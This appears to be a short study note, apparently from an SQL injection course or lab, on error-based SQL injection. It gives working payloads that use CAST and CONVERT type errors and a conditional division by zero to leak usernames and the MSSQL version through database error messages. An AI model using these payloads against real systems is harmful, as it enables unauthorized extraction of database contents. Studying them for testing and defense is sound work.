Error-based SQLi

sqlinjectionfundamentals sqlinjectionlm sqlilab validation sql_injection_authentication sql_injection_string sqli_visible_errors

Error messages are sometimes enabled. They make it easier to exploit another type of SQL injection, such as Union-based SQLi.

If no other easiest SQLi attack is possible, we may use error messages to dump the database.

-- Error: Incorrect INTEGER value: 'admin'
Select 1=CAST((SELECT username FROM membres LIMIT 1) AS int)

-- Error: Division by zero
Select [...] where 1=(case when (1=1) then 1/0 else 0 end)

In MSSQL, if CAST doesn't work, try convert:

-- Conversion failed ... value 'Microsoft SQL [...]' ...
Select convert(int,@@version)
Select convert(int,(select @@version))